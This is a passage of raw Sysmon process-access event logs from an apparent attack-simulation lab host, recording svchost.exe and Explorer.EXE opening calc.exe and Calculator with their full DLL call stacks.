.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361689Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.288{8e433fbf-2a47-6013-6b00-000000001100}55324628C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361688Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.288{8e433fbf-2a47-6013-6b00-000000001100}55324628C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361687Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.288{8e433fbf-2a47-6013-6b00-000000001100}55324628C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361686Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.288{8e433fbf-2a47-6013-6b00-000000001100}55324628C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361685Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.288{8e433fbf-2a47-6013-6b00-000000001100}55324628C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361684Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.288{8e433fbf-2a47-6013-6b00-000000001100}55324628C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361683Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.288{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361682Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.288{8e433fbf-2a47-6013-6b00-000000001100}55324628C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361681Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.288{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361680Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.288{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361679Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.288{8e433fbf-2a47-6013-6b00-000000001100}55324628C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361678Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.272{8e433fbf-2a47-6013-6b00-000000001100}55324628C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361677Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.272{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1f822|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361676Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.272{8e433fbf-2a47-6013-6b00-000000001100}55324628C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+37cee|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361675Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.272{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d419|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e 10341000x8000000000000000361674Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.272{8e433fbf-337b-6013-8402-000000001100}16563520C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1440C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\NPSMDesktopProvider.dll+10c49|C:\Windows\System32\NPSMDesktopProvider.dll+10b82|C:\Windows\System32\NPSMDesktopProvider.dll+774d|C:\Windows\System32\shcore.dll+c590|C:\Windows\System32\shcore.dll+c218|C:\Windows\System32\shcore.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361673Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.272{8e433fbf-2a47-6013-6b00-000000001100}55324628C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d70c|c:\windows\system32\windows.staterepository.dll+28a17|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361672Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.272{8e433fbf-2a44-6013-1100-000000001100}11166060C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|c:\windows\system32\rpcss.dll+32369|c:\windows\system32\rpcss.dll+319fb|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+1451a|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361671Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.272{8e433fbf-2a44-6013-0e00-000000001100}71210564C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\rpcss.dll+46b32|c:\windows\system32\rpcss.dll+46af3|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+1451a|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361670Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.272{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1f822|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361669Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.272{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d419|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e 10341000x8000000000000000361668Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.257{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1f822|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361667Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 